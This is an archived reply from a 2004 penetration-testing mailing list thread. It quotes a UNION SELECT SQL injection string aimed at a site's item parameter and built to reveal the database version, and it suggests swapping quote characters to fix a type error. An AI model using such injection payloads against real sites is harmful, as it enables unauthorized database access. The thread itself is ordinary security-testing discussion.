Penetration Testing mailing list archives
Re: SQL Injection & ncompatible with int issue
From: Martin Eiszner <martin () websec org>
Date: Sun, 13 Jun 2004 12:32:13 +0200
hi, On 9 Jun 2004 23:51:06 -0000 Peter Bair <peterbair100 () hotmail com> wrote:
xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--
did you try it with ' instead of " ? mei
Current thread:
- SQL Injection & ncompatible with int issue Peter Bair (Jun 10)
- Re: SQL Injection & ncompatible with int issue Martin Eiszner (Jun 14)
- <Possible follow-ups>
- RE: SQL Injection & ncompatible with int issue Amichai Shulman (Jun 14)